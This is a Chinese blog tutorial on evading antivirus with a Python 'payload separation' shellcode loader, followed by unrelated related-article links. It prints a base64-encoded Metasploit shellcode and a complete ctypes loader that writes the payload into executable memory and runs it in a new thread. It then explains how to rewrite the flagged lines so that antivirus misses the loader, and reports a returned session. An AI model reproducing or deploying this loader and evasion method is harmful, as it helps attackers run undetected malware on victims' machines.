通过Python实现Payload分离免杀过程详解


Posted in Python onJuly 13, 2020

缺点:

编译成exe以后体积过大

实现:

msf生成shellcode代码:

通过Python实现Payload分离免杀过程详解

将payload给copy下来,去除引号。

\x2f\x4f\x69\x43\x41\x41\x41\x41\x59\x49\x6e\x6c\x4d\x63\x42
\x6b\x69\x31\x41\x77\x69\x31\x49\x4d\x69\x31\x49\x55\x69\x33
\x49\x6f\x44\x37\x64\x4b\x4a\x6a\x48\x2f\x72\x44\x78\x68\x66
\x41\x49\x73\x49\x4d\x48\x50\x44\x51\x48\x48\x34\x76\x4a\x53
\x56\x34\x74\x53\x45\x49\x74\x4b\x50\x49\x74\x4d\x45\x58\x6a
\x6a\x53\x41\x48\x52\x55\x59\x74\x5a\x49\x41\x48\x54\x69\x30
\x6b\x59\x34\x7a\x70\x4a\x69\x7a\x53\x4c\x41\x64\x59\x78\x2f
\x36\x7a\x42\x7a\x77\x30\x42\x78\x7a\x6a\x67\x64\x66\x59\x44
\x66\x66\x67\x37\x66\x53\x52\x31\x35\x46\x69\x4c\x57\x43\x51
\x42\x30\x32\x61\x4c\x44\x45\x75\x4c\x57\x42\x77\x42\x30\x34
\x73\x45\x69\x77\x48\x51\x69\x55\x51\x6b\x4a\x46\x74\x62\x59
\x56\x6c\x61\x55\x66\x2f\x67\x58\x31\x39\x61\x69\x78\x4c\x72
\x6a\x56\x31\x6f\x4d\x7a\x49\x41\x41\x47\x68\x33\x63\x7a\x4a
\x66\x56\x47\x68\x4d\x64\x79\x59\x48\x69\x65\x6a\x2f\x30\x4c
\x69\x51\x41\x51\x41\x41\x4b\x63\x52\x55\x55\x47\x67\x70\x67
\x47\x73\x41\x2f\x39\x56\x71\x43\x6d\x6a\x41\x71\x41\x4d\x38
\x61\x41\x49\x41\x44\x51\x57\x4a\x35\x6c\x42\x51\x55\x46\x42
\x41\x55\x45\x42\x51\x61\x4f\x6f\x50\x33\x2b\x44\x2f\x31\x5a
\x64\x71\x45\x46\x5a\x58\x61\x4a\x6d\x6c\x64\x47\x48\x2f\x31
\x59\x58\x41\x64\x41\x72\x2f\x54\x67\x68\x31\x37\x4f\x68\x6e
\x41\x41\x41\x41\x61\x67\x42\x71\x42\x46\x5a\x58\x61\x41\x4c
\x5a\x79\x46\x2f\x2f\x31\x59\x50\x34\x41\x48\x34\x32\x69\x7a
\x5a\x71\x51\x47\x67\x41\x45\x41\x41\x41\x56\x6d\x6f\x41\x61
\x46\x69\x6b\x55\x2b\x58\x2f\x31\x5a\x4e\x54\x61\x67\x42\x57
\x55\x31\x64\x6f\x41\x74\x6e\x49\x58\x2f\x2f\x56\x67\x2f\x67
\x41\x66\x53\x68\x59\x61\x41\x42\x41\x41\x41\x42\x71\x41\x46
\x42\x6f\x43\x79\x38\x50\x4d\x50\x2f\x56\x56\x32\x68\x31\x62
\x6b\x31\x68\x2f\x39\x56\x65\x58\x76\x38\x4d\x4a\x41\x2b\x46
\x63\x50\x2f\x2f\x2f\x2b\x6d\x62\x2f\x2f\x2f\x2f\x41\x63\x4d
\x70\x78\x6e\x58\x42\x77\x37\x76\x77\x74\x61\x4a\x57\x61\x67
\x42\x54\x2f\x39\x55\x3d

将自己的代码放入第3行的shell_code位置。

import ctypes,base64
 
encode_shellcode = "shell_code"
shellcode = base64.b64decode(encode_shellcode)
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode))
handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)

以上代码是绝对会被查杀的,但是可以通过修改代码绕过。思路如下,先查找杀软查杀哪里,再修改杀软查杀的代码,同时保证正常运行。提示一下,查杀的代码再5-6行之间,对其进行修改即可。

返回session:

通过Python实现Payload分离免杀过程详解

免杀效果:

通过Python实现Payload分离免杀过程详解

参考资料:

https://github.com/TideSec/BypassAntiVirus

https://micro8.gitbook.io/micro8/

以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持三水点靠木。

Python 相关文章推荐
python 字符串转列表 list 出现\ufeff的解决方法
Jun 22 Python
浅谈python可视化包Bokeh
Feb 07 Python
python实现根据指定字符截取对应的行的内容方法
Oct 23 Python
Python爬虫实战之12306抢票开源
Jan 24 Python
Python中利用LSTM模型进行时间序列预测分析的实现
Jul 26 Python
python-序列解包(对可迭代元素的快速取值方法)
Aug 24 Python
python pycharm的安装及其使用
Oct 11 Python
用OpenCV将视频分解成单帧图片,图片合成视频示例
Dec 10 Python
python 实现PIL模块在图片画线写字
May 16 Python
Python flask路由间传递变量实例详解
Jun 03 Python
使用Python实现微信拍一拍功能的思路代码
Jul 09 Python
Python实现自动签到脚本的示例代码
Aug 19 Python
python上selenium的弹框操作实现
Jul 13 #Python
python如何导入依赖包
Jul 13 #Python
python入门:argparse浅析 nargs='+'作用
Jul 12 #Python
浅谈Python 命令行参数argparse写入图片路径操作
Jul 12 #Python
Python实现封装打包自己写的代码,被python import
Jul 12 #Python
Django封装交互接口代码
Jul 12 #Python
在django中实现choices字段获取对应字段值
Jul 12 #Python
You might like
php中的MVC模式运用技巧
2007/05/03 PHP
解析smarty 截取字符串函数 truncate的用法介绍
2013/06/20 PHP
PHP中加密解密函数与DES加密解密实例
2014/10/17 PHP
PHP使用NuSOAP调用Web服务的方法
2015/07/18 PHP
Windows下PHP开发环境搭建教程(Apache+PHP+MySQL)
2016/06/13 PHP
在b/s开发中经常用到的javaScript技术
2006/08/23 Javascript
点击文章内容处弹出页面代码
2009/10/01 Javascript
parseInt parseFloat js字符串转换数字
2010/08/01 Javascript
Javascript:为input设置readOnly属性(示例讲解)
2013/12/25 Javascript
jQuery及JS实现循环中暂停的方法
2015/02/02 Javascript
基于jQuery倾斜打开侧边栏菜单特效代码
2015/09/15 Javascript
javascript简单进制转换实现方法
2016/11/24 Javascript
vue实现长图垂直居上 vue实现短图垂直居中
2017/10/18 Javascript
基于 D3.js 绘制动态进度条的实例详解
2018/02/26 Javascript
微信小程序使用map组件实现路线规划功能示例
2019/01/22 Javascript
解决Vue在Tomcat8下部署页面不加载的问题
2019/11/12 Javascript
Python 文件和输入输出小结
2013/10/09 Python
python中的列表推导浅析
2014/04/26 Python
详解Python设计模式编程中观察者模式与策略模式的运用
2016/03/02 Python
Python实现简单的多任务mysql转xml的方法
2017/02/08 Python
Python中单、双下划线的区别总结
2017/12/01 Python
python3 selenium 切换窗口的几种方法小结
2018/05/21 Python
Django使用unittest模块进行单元测试过程解析
2019/08/02 Python
Python如何避免文件同名产生覆盖
2020/06/09 Python
python 元组和列表的区别
2020/12/30 Python
Python用access判断文件是否被占用的实例方法
2020/12/17 Python
纯css3实现走马灯效果
2014/12/26 HTML / CSS
C#面试题问题集
2016/04/02 面试题
公务员综合考察材料
2014/02/01 职场文书
2014教师评职称工作总结
2014/11/10 职场文书
背起爸爸上学观后感
2015/06/08 职场文书
学籍证明模板
2015/06/18 职场文书
2019旅游导游工作总结
2019/06/27 职场文书
pytorch中F.avg_pool1d()和F.avg_pool2d()的使用操作
2021/05/22 Python
教你用Python爬取英雄联盟皮肤原画
2021/06/13 Python
十大最强飞行系宝可梦,BUG燕上榜,第二是飞行系王者
2022/03/18 日漫